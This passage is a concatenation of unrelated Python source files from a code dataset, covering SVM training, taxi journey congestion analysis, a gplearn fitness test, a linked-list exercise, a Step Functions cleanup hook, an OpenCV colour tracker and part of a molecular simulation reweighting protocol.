\")))\r\n\t\t\tX_t_new_2 = [float(line[line.index(\".\"):]) for line in X_t_new] #(extract float - leave out index...)\r\n\t\t\tX_t.append(X_t_new_2)\r\n\treturn np.asarray(X_t),np.asarray(y_t)\r\n\r\ndef sklearn_libsvm_wrapper(X_train,y_train,X_test,y_test):\r\n\tdef SKLEARN_SVM(X_train,y_train,X_test,y_test,penalty='l2'):\r\n\t\tclf = LinearSVC(penalty=penalty)\r\n\t\tclf.fit(X_train,y_train)\r\n\t\twith open(\"sklearn_svm.pkl\", \"wb\") as f_pkl:\r\n\t\t\tpickle.dump(clf, f_pkl)\r\n\t\tscore = clf.score(X_test, y_test)\r\n\t\tprint(\"score: {}\".format(score))\r\n\t\twith open(\"sklearn_score.txt\", \"w\") as f_score:\r\n\t\t\tf_score.write(\"score: {}\".format(score))\r\n\tdef LIBSVM_svm(X_train,y_train,X_test,y_test,C=10):\r\n\t\tprob = svm_problem(y_train,X_train)\r\n\t\tparams = svm_parameter('-s 0 -t 0 -c 5')\r\n\t\tmodel = svm_train(prob, params)\r\n\t\t_,(accr,MSE,SCC),_ = svm_predict(y_test,X_test,model)\r\n\t\tprint(\"Accuracy: {}\\nMSE: {}\\nSCC: {}\\n\".format(accr,MSE,SCC))\r\n\t\tsvm_save_model(\"chin_char.model\",model)\r\n\tLIBSVM_svm(X_train.tolist(),y_train.tolist(),X_test.tolist(),y_test.tolist())\r\n\tSKLEARN_SVM(X_train,y_train,X_test,y_test)\r\n\r\n\r\n# determine how to work w/ the training data\r\n\r\n# 100 samples/class train; 20 samples/class test\r\ndef main_shell():\r\n\tprint(\"Two SVMs: one using Sklearn and another using LIBSVM\")\r\n\tparser = argparse.ArgumentParser(description=\"\"\"Argument parser for SVM:\\n\"\"\")\r\n\tparser.add_argument('--NUM_CLASSES',type=int, default=200, help='input denoting number of classes to discern')\r\n\tparser.add_argument('--NUM_PTS_PER_CLASS_1',type=int, default=100, help='number of training pts per class [MAX=118]')\r\n\tparser.add_argument('--NUM_PTS_PER_CLASS_2',type=int,default=20, help='number of test pts per class [MAX=28]')\r\n\targs = parser.parse_args()\r\n\tif(not((\"svm_data\" in os.listdir(os.getcwd())) and (\"chin_char.tr\" in \r\n\t\tos.listdir(JOIN(os.getcwd(),\"svm_data\"))) and \r\n\t\t(\"chin_char.te\" in os.listdir(JOIN(os.getcwd(),\"svm_data\"))))): \r\n\t\tpreprocess_data_svm(\"chin_char_trn_preproc2\",\"chin_char_tst_preproc2\",\r\n\t\t\targs.NUM_CLASSES,args.NUM_PTS_PER_CLASS_1,args.NUM_PTS_PER_CLASS_2)\r\n\r\n\t#NOTE: data available in \"chin_char.tr\" and \"chin_char.te\" files respectively; \r\n\t\t# You can navigate to \"svm_data\" from CMD and run via command line, provided you setup libsvm\r\n\tX_train,y_train = train_test_X_Y(JOIN(JOIN(os.getcwd(), \"svm_data\"), \"chin_char.tr\"))\r\n\tX_test,y_test = train_test_X_Y(JOIN(JOIN(os.getcwd(), \"svm_data\"), \"chin_char.te\"))\r\n\tsklearn_libsvm_wrapper(X_train,y_train,X_test,y_test)\r\n\r\nmain_shell()\r\n","sub_path":"data_training_svm.py","file_name":"data_training_svm.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"8094345","text":"# -*- coding: UTF-8 -*-\n#.@FileName:AdvancedSkeleton_link\n#.@Date:2019-03-15:18:53\n#.@Aurhor:LuoOu\nimport maya.mel as mel\nimport os\n\n\ndef main(*args):\n script = os.path.realpath(__file__)\n scripts_dir = os.path.dirname(script)\n scriptsPath = scripts_dir.replace(\"RIG\", \"ScriptPackages\").replace('\\\\',r'/')\n mel.eval('source \"{}/RIG/Animate8_SetupToolWin/Animate8_SetupToolWin\"'.format(scriptsPath))\n\n\n","sub_path":"software/maya/scripts/Rig/Animate8_SetupToolWin_link.py","file_name":"Animate8_SetupToolWin_link.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"307780781","text":"import numpy as np\nimport pandas as pd\nimport datetime as dt\nimport os\n\n# todo check code is saving properly\n# todo implement percentile factor method\n\n# Use import cProfile\n#\n# import cProfile\n# pr = cProfile.Profile()\n# pr.enable()\n# your_function_call()\n# pr.disable()\n# # after your program ends\n# pr.print_stats(sort=\"calls\")\n\n# to profile each method\n\ntime_bins = [8*60*60, 10*60*60, 16*60*60, 18*60*60, 24*60*60]\ntime_cats = np.array(['Morning', 'MorningRush', 'Day', 'AfternoonRush', 'Night'])\n\n\ndef find_individual_raw_data():\n path = 'M:/GitHub/Anomaly-Detection/Individual/yellow_tripdata_2018-01.csv'\n return pd.read_csv(path)\n\n\ndef find_multiple_raw_data():\n print('Getting multiple raw data files...')\n path = 'C:/Users/medkmin/PycharmProjects/TransportData/Multiple'\n\n files = []\n for r, d, f in os.walk(path):\n for file in f:\n if '.csv' in file:\n files.append(os.path.join(r, file))\n\n column_names = ['PU_Datetime', 'DO_Datetime', 'PU_Location', 'DO_Location']\n data = pd.DataFrame()\n\n for file in files:\n\n def converter_function(value):\n if value == '':\n return -1\n return int(value)\n\n if 'fhv' in file:\n print('Reading data \"fhv\"...')\n file_data = pd.read_csv(file,\n parse_dates=[0, 1],\n infer_datetime_format=True,\n usecols=[0, 1, 2, 3],\n names=column_names,\n converters={2: converter_function, 3: converter_function},\n header=0)\n print('Data read.')\n data = pd.concat([data, clean_raw_data(file_data)], ignore_index=True)\n\n elif 'yellow' in file:\n print('Reading data \"yellow\"...')\n file_data = pd.read_csv(file,\n parse_dates=[0, 1],\n infer_datetime_format=True,\n usecols=[1, 2, 7, 8],\n names=column_names,\n converters={7: converter_function, 8: converter_function},\n header=0)\n print('Data read.')\n data = pd.concat([data, clean_raw_data(file_data)], ignore_index=True)\n\n elif 'green' in file:\n print('Reading data \"green\"...')\n file_data = pd.read_csv(file,\n parse_dates=[0, 1],\n infer_datetime_format=True,\n usecols=[1, 2, 5, 6],\n names=column_names,\n converters={5: converter_function, 6: converter_function},\n header=0)\n print('Data read.')\n data = pd.concat([data, clean_raw_data(file_data)], ignore_index=True)\n\n else:\n print('raw data error')\n\n return data\n\n\ndef clean_raw_data(data):\n print('Cleaning data...')\n\n data.dropna(inplace=True)\n data.drop_duplicates(inplace=True)\n data['JourneyTime'] = [journey_time.seconds for journey_time in (data['DO_Datetime'] - data['PU_Datetime'])]\n data['Link'] = [str({x, y}) for x, y in zip(data['PU_Location'], data['DO_Location'])]\n\n data['PU_Datetime'] = data['PU_Datetime'].apply(lambda x: (x - dt.datetime(x.year, x.month, x.day)).seconds)\n bins = np.digitize(data['PU_Datetime'].values, bins=time_bins)\n data['TimeCats'] = time_cats[bins]\n data = (data.drop(columns=data.columns[0:4]))\n print('Data cleaned.')\n return data\n\n\ndef calculate_average_journey_time(data):\n print('Calculating average journey time...')\n average_time = data.groupby(['Link', 'TimeCats']).mean().unstack('TimeCats')\n average_time.columns = time_cats\n print('Average journey time calculated.')\n return average_time\n\n\ndef run_congestion_factor_method(c_data, h_data, congestion_factor):\n print('Running congestion method...')\n\n# todo check values of h_data and c_data. Getting runtime errors\n\n c_data['IsCongested'] = [c_data.iloc[index, 0] >\n congestion_factor * h_data.loc[c_data.iloc[index, 1], c_data.iloc[index, 2]]\n for index in range(c_data.shape[0])]\n c_data['CongestionTime'] = [congestion_factor * h_data.loc[c_data.iloc[index, 1], c_data.iloc[index, 2]]\n for index in range(c_data.shape[0])]\n print('Congestion method complete.')\n return c_data\n\n\n# raw_data = find_individual_raw_data()\n# print(raw_data.head())\n# clean_data = clean_raw_data(raw_data.iloc[:100, :], 'yellow')\n\nclean_data = find_multiple_raw_data()\n# print(clean_data)\nhistorical_data = calculate_average_journey_time(clean_data)\n# print(historical_data)\ncongested_data = run_congestion_factor_method(clean_data, historical_data, congestion_factor=100)\nprint(congested_data[congested_data['IsCongested']])\ncongested_data.to_csv('M:/GitHub/Anomaly-Detection/PyCharmProjects')\n\n\n","sub_path":"PyCharmProjects/CleanData.py","file_name":"CleanData.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"625536067","text":"from gpquant.gp_middleware import Middleware\nimport ctypes\nfrom numpy.ctypeslib import ndpointer\nfrom gpquant.gp_dynamic import *\nfrom gpquant.gp_fitness import *\nfrom gplearn.genetic import SymbolicRegressor\nfrom gplearn.fitness import make_fitness\n\nfrom ctypes import Structure\nimport pydotplus\n\n\nclass DataPackage(Structure):\n _fields_ = [('n_data', ctypes.c_int), ('n_dim', ctypes.c_int),\n ('data', ctypes.POINTER(ctypes.POINTER(ctypes.c_double)))]\n\n\nmid = Middleware(\"GPQuant.dll\")\nget_data_func = mid.get_function(\"?get_data@BackTesting@GPQuant@@SA?AUTestDataPackage@2@XZ\")\nget_data_func.restype = DataPackage\n\nget_reward_func = mid.get_function(\"?get_reward@BackTesting@GPQuant@@SANPEAHPEAN@Z\")\nget_reward_func.restype = ctypes.c_double\n\npackage = get_data_func()\nn_dim = int(package.n_dim)\nn_data = int(package.n_data)\n\nx_data = []\nfor i in range(n_dim):\n _x_data = []\n for j in range(n_data):\n _x_data.append(package.data[i][j])\n x_data.append(_x_data)\nx_data = np.transpose(np.array(x_data))\nprint(x_data)\n\n\n#\n# class DataPackage(Structure):\n# _fields_ = [('n_data', ctypes.c_int), ('data', ctypes.POINTER(ctypes.c_double))]\n#\n#\n# mid = Middleware(\"GPQuant_struct.dll\")\n# get_data_func = mid.get_function(\"?get_data@BackTesting@gpquant@@SA?AUTestDataPackage@2@XZ\")\n# get_data_func.restype = DataPackage\n#\n#\n# package = get_data_func()\n# n_data = int(package.n_data)\n\n#\n# mid = Middleware(\"gpquant.dll\")\n# get_data_func = mid.get_function(\"?get_data@BackTesting@gpquant@@SAPEANXZ\")\n# get_data_func.restype = ndpointer(dtype=ctypes.c_double, shape=(10,))\n# x_data = get_data_func()\n#\n# get_reward_func = mid.get_function(\"?get_reward@BackTesting@gpquant@@SANPEAHPEAN@Z\")\n# get_reward_func.restype = ctypes.c_double\n#\n#\ndef explicit_fitness(y, y_pred, sample_weight):\n n_data = len(y)\n y = [int(_) for _ in y]\n indices = (ctypes.c_int * n_data)(*y)\n arr = (ctypes.c_double * n_data)(*y_pred)\n res = get_reward_func(indices, arr)\n # print(res)\n return res\n\n\n# metric_gp = DynamicSymbolicRegressor.make_explict_fitness(get_reward_func, y_as_fitness, False)\n\n\n# x_data = x_data.reshape(10, 1)\nest_gp = SymbolicRegressor(population_size=50,\n generations=20, stopping_criteria=0.01,\n p_crossover=0.7, p_subtree_mutation=0.1,\n p_hoist_mutation=0.05, p_point_mutation=0.1,\n metric=make_fitness(explicit_fitness, False),\n max_samples=0.9, verbose=1,\n parsimony_coefficient=0.01, random_state=0)\n_ = [i for i in range(x_data.shape[0])]\nest_gp.fit(x_data, _)\nfrom PIL import Image\n\ngraph = pydotplus.graphviz.graph_from_dot_data(est_gp._program.export_graphviz())\ngraph.write_png(\"tree.png\")\n# print([method for method in dir(graph) if callable(getattr(graph, method))])\n# Image.open(graph.create_png())\n","sub_path":"gpquant/tests/test_gpquant.py","file_name":"test_gpquant.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"395951117","text":"class Node:\n def __init__(self,value):\n self.data = value\n self.next = None\n def add(self,value):\n curNode = self\n while curNode.next:\n curNode = curNode.next\n curNode.next = Node(value)\n def __repr__(self):\n curNode = self\n build = []\n while curNode:\n build.append(str(curNode.data))\n curNode = curNode.next\n return '->'.join(build)\n def toList(self):\n curNode = self\n out = []\n while curNode:\n out.append(curNode.data)\n curNode = curNode.next\n return out\n\ndef removeDupe(lst):\n first = lst\n while first:\n second = first\n while second.next:\n if second.next.data == first.data:\n second.next = second.next.next\n else:\n second = second.next\n first = first.next\n\nb = Node(1)\nb.add(1)\nb.add(1)\nb.add(1)\nb.add(1)\nb.add(3)\nb.add(4)\nb.add(1)\nb.add(1)\nb.add(1)\nb.add(2)\nremoveDupe(b)\nassert b.toList() == [1,3,4,2]","sub_path":"2.1.py","file_name":"2.1.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"324876526","text":"\"\"\"Replicated Function Remover.\"\"\"\n# pylint: disable=unused-argument\nimport json\nimport logging\nfrom typing import Any, Dict, Optional, Union # pylint: disable=unused-import\n\nfrom runway.cfngin.context import Context # pylint: disable=unused-import\nfrom runway.cfngin.providers.base import BaseProvider # pylint: disable=W\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef execute(\n context, # type: Context # pylint: disable=unused-argument\n provider, # type: BaseProvider\n **kwargs # type: Optional[Dict[str, Any]]\n):\n # type: (...) -> Union[Dict[str, Any], bool]\n \"\"\"Execute the cleanup process.\n\n A StateMachine will be executed that stays active after the main and\n dependency stacks have been deleted. This will keep attempting to\n delete the Replicated functions that were created as part of the main\n stack. Once it has deleted all the Lambdas supplied it will self\n destruct its own stack.\n\n Args:\n context (:class:`runway.cfngin.context.Context`): The context\n instance.\n provider (:class:`runway.cfngin.providers.base.BaseProvider`):\n The provider instance.\n\n Keyword Args:\n function_arns (List[str]): The arns of all the Replicated functions to\n delete.\n state_machine_arn (str): The ARN of the State Machine to execute.\n stack_name (str): The name of the Cleanup stack to delete.\n\n \"\"\"\n session = context.get_session()\n step_functions_client = session.client(\"stepfunctions\")\n\n try:\n step_functions_client.start_execution(\n stateMachineArn=kwargs[\"state_machine_arn\"],\n input=json.dumps(\n {\n \"SelfDestruct\": {\n \"StateMachineArn\": kwargs[\"state_machine_arn\"],\n \"StackName\": kwargs[\"stack_name\"],\n },\n \"FunctionArns\": kwargs[\"function_arns\"],\n }\n ),\n )\n return True\n except Exception: # pylint: disable=broad-except\n LOGGER.exception(\"could not complete cleanup\")\n return False\n","sub_path":"runway/hooks/staticsite/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"603175601","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base,Restaurant,MenuItem\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nupdateRestaurant = session.query(Restaurant).filter_by(id=1).one()\nupdateRestaurant.name='Khan and Singh'\nsession.add(updateRestaurant)\nsession.commit()","sub_path":"vagrant/restaurant/update_tables.py","file_name":"update_tables.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"6930126","text":"import cv2\nimport numpy as np\nfrom collections import OrderedDict\nimport tracker as tracker\n\nclass Colores:\n\tblue_lower = np.array([100,100,23], np.uint8)\n\tblue_upper = np.array([125,255,255], np.uint8)\n\n#\tyellow_lower = np.array([15,100,20], np.uint8)\n#\tyellow_upper = np.array([45,255, 255], np.uint8)\n\n\tyellow_lower = np.array([20, 100, 100])\n\tyellow_upper = np.array([30, 255, 255])\n\n\tred1_lower = np.array([0,100,20], np.uint8)\n\tred1_upper = np.array([5,255,255], np.uint8)\n\n\tred2_lower = np.array([175,100,20], np.uint8)\n\tred2_upper = np.array([179,255,255], np.uint8)\n\n\tgreenLower = (29, 86, 6)\n\tgreenUpper = (64, 255, 255)\n\n\tcolores = ['blue', 'yellow', 'red']\n\tmasks = [0, 0, 0]\n\ttotal = [0, 0, 0]\n\tborder_colors = [(255,0,0), (0,255,255), (0,0,255)]\n\n\tdef __init__(self):\n\t\tself.cap = cv2.VideoCapture(0)\n\t\tself.frame = None\n\t\tself.tracker = tracker.Tracker()\n\n\tdef start(self):\n\t\twhile True:\n\t\t\tret, self.frame = self.cap.read()\n\t\t\tself.frame = cv2.flip(self.frame, cv2.ROTATE_90_CLOCKWISE) # Rota la imagen 90 degrees\n\n\t\t\tself.rects = []\n\t\t\tframeHSV = self.setHSVColorModel()\n\t\t\tself.maskFrame(frameHSV)\n\t\t\tself.dibujarContornos()\n\t\t\tself.tracker.update(self.rects)\n\t\t\tself.total = self.tracker.setTrackeableObjects(self.total)\n\t\t\tself.markObjects()\n\t\t\tself.showResults()\n\n\t\t\tif ret == True:\n\t\t\t\tcv2.imshow('Frame', self.frame)\n\n\t\t\tif cv2.waitKey(1) & 0xFF == ord('s'):\n\t\t\t\tbreak\n\n\t\tself.destroy()\n\n\tdef markObjects(self):\n\t\tfor (objectID, coords) in self.tracker.getObjects():\n\t\t\ttext = \"ID {}\".format(objectID)\n\t\t\tcv2.putText(self.frame, text, (coords[1] + 10, coords[2]),\n\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n\t\t\tself.dibujarPunto(coords[1], coords[2])\n\n\tdef showResults(self):\n\t\tfor i in range(len(self.colores)):\n\t\t\ttext = \"{}: {}\".format(self.colores[i], self.total[i])\n\t\t\tcv2.putText(self.frame, text, (10, ((i * 20) + 20)),\n\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n\n\tdef setHSVColorModel(self):\n\t\treturn cv2.cvtColor(self.frame, cv2.COLOR_BGR2HSV)\n\n\tdef maskFrame(self, frameHSV):\n\t\tself.masks[0] = cv2.inRange(frameHSV, self.blue_lower, self.blue_upper)\n\t\tself.masks[1] = cv2.inRange(frameHSV, self.yellow_lower, self.yellow_upper)\n\t\tself.masks[2] = cv2.add(\n\t\t\t\tcv2.inRange(frameHSV, self.red1_lower, self.red1_upper),\n\t\t\t\tcv2.inRange(frameHSV, self.red2_lower, self.red2_upper)\n\t\t\t)\n\n\tdef dibujarContornos(self):\n\t\tfor mask in range(len(self.masks)):\n\t\t\t(_,contornos,hierarchy) = cv2.findContours(self.masks[mask], cv2.RETR_EXTERNAL,\n\t\t\t\tcv2.CHAIN_APPROX_SIMPLE)\n\t\t\tfor pic, contour in enumerate(contornos):\n\t\t\t\tif (cv2.contourArea(contour) > 600):\n\t\t\t\t\tx,y,w,h = cv2.boundingRect(contour)\n\t\t\t\t\tcv2.rectangle(self.frame,(x,y),(x+w,y+h), self.border_colors[mask], 3)\n\t\t\t\t\tcv2.putText(self.frame, '{},{}'.format(x, y), (x+10, y),\n\t\t\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.75, [255,255,0], 1, cv2.LINE_AA)\n\t\t\t\t\tself.rects.append((mask, x, y, w, h))\n\n\tdef dibujarLinea(self):\n\t\tcv2.line(self.frame, (0 , 230), (640 , 230), (100,155,30), 3)\n\n\tdef dibujarPunto(self, x, y):\n\t\tcv2.circle(self.frame, (x,y), 7, (0, 255, 0), -1)\n\n\tdef destroy(self):\n\t\tself.cap.release()\n\t\tcv2.destroyAllWindows()\n","sub_path":"colores.py","file_name":"colores.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"649466056","text":"\"\"\"\nA collection of protocols for reweighting cached simulation data.\n\"\"\"\nimport copy\nimport logging\nimport re\nfrom os import path\n\nimport numpy as np\nimport typing\nfrom simtk import openmm\nfrom simtk.openmm import app\n\nfrom propertyestimator import unit\nfrom propertyestimator.forcefield import ForceFieldSource, SmirnoffForceFieldSource\nfrom propertyestimator.properties.properties import ParameterGradientKey, ParameterGradient\nfrom propertyestimator.substances import Substance\nfrom propertyestimator.thermodynamics import ThermodynamicState\nfrom propertyestimator.utils.exceptions import PropertyEstimatorException\nfrom propertyestimator.utils.openmm import pint_quantity_to_openmm, setup_platform_with_resources, \\\n openmm_quantity_to_pint, disable_pbc\nfrom propertyestimator.utils.quantities import EstimatedQuantity\nfrom propertyestimator.utils.statistics import StatisticsArray, ObservableType\nfrom propertyestimator.workflow.decorators import protocol_input, protocol_output, UNDEFINED\nfrom propertyestimator.workflow.plugins import register_calculation_protocol\nfrom propertyestimator.workflow.protocols import BaseProtocol\n\n\n@register_calculation_protocol()\nclass GradientReducedPotentials(BaseProtocol):\n \"\"\"A protocol to estimates the the reduced potential of the configurations\n of a trajectory using reverse and forward perturbed simulation parameters for\n use with estimating reweighted gradients using the central difference method.\n \"\"\"\n\n reference_force_field_paths = protocol_input(\n docstring='A list of paths to the force field files which were '\n 'originally used to generate the configurations.',\n type_hint=list,\n default_value=UNDEFINED\n )\n force_field_path = protocol_input(\n docstring='The path to the force field which contains the parameters to '\n 'differentiate the observable with respect to.',\n type_hint=str,\n default_value=UNDEFINED\n )\n\n reference_statistics_path = protocol_input(\n docstring='An optional path to the statistics array which was '\n 'generated alongside the observable of interest, which will '\n 'be used to correct the potential energies at the reverse '\n 'and forward states. This is only really needed when the '\n 'observable of interest is an energy.',\n type_hint=str,\n default_value=UNDEFINED,\n optional=True\n )\n\n enable_pbc = protocol_input(\n docstring='If true, periodic boundary conditions will be enabled when '\n 're-evaluating the reduced potentials.',\n type_hint=bool,\n default_value=True\n )\n\n substance = protocol_input(\n docstring='The substance which describes the composition of the system.',\n type_hint=Substance,\n default_value=UNDEFINED\n )\n thermodynamic_state = protocol_input(\n docstring='The thermodynamic state to estimate the gradients at.',\n type_hint=ThermodynamicState,\n default_value=UNDEFINED\n )\n\n coordinate_file_path = protocol_input(\n docstring='A path to a PDB coordinate file which describes the topology of '\n 'the system.',\n type_hint=str,\n default_value=UNDEFINED\n )\n trajectory_file_path = protocol_input(\n docstring='A path to the trajectory of configurations',\n type_hint=str,\n default_value=UNDEFINED\n )\n\n parameter_key = protocol_input(\n docstring='The key of the parameter to differentiate with respect to.',\n type_hint=ParameterGradientKey,\n default_value=UNDEFINED\n )\n\n perturbation_scale = protocol_input(\n docstring='The amount to perturb the parameter by, such that '\n 'p_new = p_old * (1 +/- `perturbation_scale`)',\n type_hint=float,\n default_value=1.0e-4\n )\n\n use_subset_of_force_field = protocol_input(\n docstring='If true, the reduced potential will be estimated using '\n 'an OpenMM system which only contains the parameter of '\n 'interest',\n type_hint=bool,\n default_value=True\n )\n\n effective_sample_indices = protocol_input(\n docstring='This a placeholder input which is not currently implemented.',\n type_hint=list,\n default_value=UNDEFINED,\n optional=True\n )\n\n reference_potential_paths = protocol_output(\n docstring='File paths to the reduced potentials evaluated using each '\n 'of the reference force fields.',\n type_hint=list\n )\n reverse_potentials_path = protocol_output(\n docstring='A file path to the energies evaluated using the parameters'\n 'perturbed in the reverse direction.',\n type_hint=str\n )\n forward_potentials_path = protocol_output(\n docstring='A file path to the energies evaluated using the parameters'\n 'perturbed in the forward direction.',\n type_hint=str\n )\n\n reverse_parameter_value = protocol_output(\n docstring='The value of the parameter perturbed in the reverse '\n 'direction.',\n type_hint=unit.Quantity\n )\n forward_parameter_value = protocol_output(\n docstring='The value of the parameter perturbed in the forward '\n 'direction.',\n type_hint=unit.Quantity\n )\n\n def _build_reduced_system(self, original_force_field, topology, scale_amount=None):\n \"\"\"Produces an OpenMM system containing only forces for the specified parameter,\n optionally perturbed by the amount specified by `scale_amount`.\n\n Parameters\n ----------\n original_force_field: openforcefield.typing.engines.smirnoff.ForceField\n The force field to create the system from (and optionally perturb).\n topology: openforcefield.topology.Topology\n The topology of the system to apply the force field to.\n scale_amount: float, optional\n The optional amount to perturb the parameter by.\n\n Returns\n -------\n simtk.openmm.System\n The created system.\n simtk.unit.Quantity\n The new value of the perturbed parameter.\n \"\"\"\n # As this method deals mainly with the toolkit, we stick to\n # simtk units here.\n from openforcefield.typing.engines.smirnoff import ForceField\n\n parameter_tag = self.parameter_key.tag\n parameter_smirks = self.parameter_key.smirks\n parameter_attribute = self.parameter_key.attribute\n\n original_handler = original_force_field.get_parameter_handler(parameter_tag)\n original_parameter = original_handler.parameters[parameter_smirks]\n\n if self.use_subset_of_force_field:\n\n force_field = ForceField()\n handler = copy.deepcopy(original_force_field.get_parameter_handler(parameter_tag))\n force_field.register_parameter_handler(handler)\n\n else:\n\n force_field = copy.deepcopy(original_force_field)\n handler = force_field.get_parameter_handler(parameter_tag)\n\n parameter_index = None\n value_list = None\n\n if hasattr(original_parameter, parameter_attribute):\n parameter_value = getattr(original_parameter, parameter_attribute)\n else:\n attribute_split = re.split(r'(\\d+)', parameter_attribute)\n\n assert len(parameter_attribute) == 2\n assert hasattr(original_parameter, attribute_split[0])\n\n parameter_attribute = attribute_split[0]\n parameter_index = int(attribute_split[1]) - 1\n\n value_list = getattr(original_parameter, parameter_attribute)\n parameter_value = value_list[parameter_index]\n\n if scale_amount is not None:\n\n existing_parameter = handler.parameters[parameter_smirks]\n\n if np.isclose(parameter_value.value_in_unit(parameter_value.unit), 0.0):\n # Careful thought needs to be given to this. Consider cases such as\n # epsilon or sigma where negative values are not allowed.\n parameter_value = (scale_amount if scale_amount > 0.0 else 0.0) * parameter_value.unit\n else:\n parameter_value *= (1.0 + scale_amount)\n\n if value_list is None:\n setattr(existing_parameter, parameter_attribute, parameter_value)\n else:\n value_list[parameter_index] = parameter_value\n setattr(existing_parameter, parameter_attribute, value_list)\n\n system = force_field.create_openmm_system(topology)\n\n if not self.enable_pbc:\n disable_pbc(system)\n\n return system, parameter_value\n\n def _evaluate_reduced_potential(self, system, trajectory, file_path,\n compute_resources, subset_energy_corrections=None):\n \"\"\"Return the potential energy.\n Parameters\n ----------\n system: simtk.openmm.System\n The system which encodes the interaction forces for the\n specified parameter.\n trajectory: mdtraj.Trajectory\n A trajectory of configurations to evaluate.\n file_path: str\n The path to save the reduced potentials to.\n compute_resources: ComputeResources\n The compute resources available to execute on.\n subset_energy_corrections: unit.Quantity, optional\n A unit.Quantity wrapped numpy.ndarray which contains a set\n of energies to add to the re-evaluated potential energies.\n This is mainly used to correct the potential energies evaluated\n using a subset of the force field back to energies as if evaluated\n using the full thing.\n\n Returns\n ---------\n propertyestimator.unit.Quantity\n A unit bearing `np.ndarray` which contains the reduced potential.\n PropertyEstimatorException, optional\n Any exceptions that were raised.\n \"\"\"\n from simtk import unit as simtk_unit\n\n integrator = openmm.VerletIntegrator(0.1 * simtk_unit.femtoseconds)\n\n platform = setup_platform_with_resources(compute_resources, True)\n openmm_context = openmm.Context(system, integrator, platform)\n\n potentials = np.zeros(trajectory.n_frames, dtype=np.float64)\n reduced_potentials = np.zeros(trajectory.n_frames, dtype=np.float64)\n\n temperature = pint_quantity_to_openmm(self.thermodynamic_state.temperature)\n beta = 1.0 / (simtk_unit.BOLTZMANN_CONSTANT_kB * temperature)\n\n pressure = pint_quantity_to_openmm(self.thermodynamic_state.pressure)\n\n for frame_index in range(trajectory.n_frames):\n\n positions = trajectory.xyz[frame_index]\n box_vectors = trajectory.openmm_boxes(frame_index)\n\n if self.enable_pbc:\n openmm_context.setPeriodicBoxVectors(*box_vectors)\n\n openmm_context.setPositions(positions)\n\n state = openmm_context.getState(getEnergy=True)\n\n unreduced_potential = state.getPotentialEnergy() / simtk_unit.AVOGADRO_CONSTANT_NA\n\n if pressure is not None and self.enable_pbc:\n unreduced_potential += pressure * state.getPeriodicBoxVolume()\n\n potentials[frame_index] = state.getPotentialEnergy().value_in_unit(simtk_unit.kilojoule_per_mole)\n reduced_potentials[frame_index] = unreduced_potential * beta\n\n potentials *= unit.kilojoule / unit.mole\n reduced_potentials *= unit.dimensionless\n\n if subset_energy_corrections is not None:\n potentials += subset_energy_corrections\n\n statistics_array = StatisticsArray()\n statistics_array[ObservableType.ReducedPotential] = reduced_potentials\n statistics_array[ObservableType.PotentialEnergy] = potentials\n statistics_array.to_pandas_csv(file_path)\n\n def execute(self, directory, available_resources):\n\n import mdtraj\n\n from openforcefield.topology import Molecule, Topology\n\n logging.info(f'Calculating the reduced gradient potentials for {self.parameter_key}: {self._id}')\n\n if len(self.reference_force_field_paths) != 1 and self.use_subset_of_force_field:\n\n return PropertyEstimatorException(directory, 'A single reference force field must be '\n 'provided when calculating the reduced '\n 'potentials using a subset of the full force')\n\n if len(self.reference_statistics_path) <= 0 and self.use_subset_of_force_field:\n\n return PropertyEstimatorException(directory, 'The path to the statistics evaluated using '\n 'the full force field must be provided.')\n\n with open(self.force_field_path) as file:\n target_force_field_source = ForceFieldSource.parse_json(file.read())\n\n if not isinstance(target_force_field_source, SmirnoffForceFieldSource):\n\n return PropertyEstimatorException(directory, 'Only SMIRNOFF force fields are supported by '\n 'this protocol.')\n\n target_force_field = target_force_field_source.to_force_field()\n\n trajectory = mdtraj.load_dcd(self.trajectory_file_path,\n self.coordinate_file_path)\n\n unique_molecules = []\n\n for component in self.substance.components:\n\n molecule = Molecule.from_smiles(smiles=component.smiles)\n unique_molecules.append(molecule)\n\n pdb_file = app.PDBFile(self.coordinate_file_path)\n topology = Topology.from_openmm(pdb_file.topology, unique_molecules=unique_molecules)\n\n # If we are using only a subset of the system object, load in the reference\n # statistics containing the full system energies to correct the output\n # forward and reverse potential energies.\n reference_statistics = None\n subset_energy_corrections = None\n\n if self.use_subset_of_force_field:\n reference_statistics = StatisticsArray.from_pandas_csv(self.reference_statistics_path)\n\n # Compute the reduced reference energy if any reference force field files\n # have been provided.\n self.reference_potential_paths = []\n\n for index, reference_force_field_path in enumerate(self.reference_force_field_paths):\n\n with open(reference_force_field_path) as file:\n reference_force_field_source = ForceFieldSource.parse_json(file.read())\n\n if not isinstance(reference_force_field_source, SmirnoffForceFieldSource):\n return PropertyEstimatorException(directory, 'Only SMIRNOFF force fields are supported by '\n 'this protocol.')\n\n reference_force_field = reference_force_field_source.to_force_field()\n reference_system, _ = self._build_reduced_system(reference_force_field, topology)\n\n reference_potentials_path 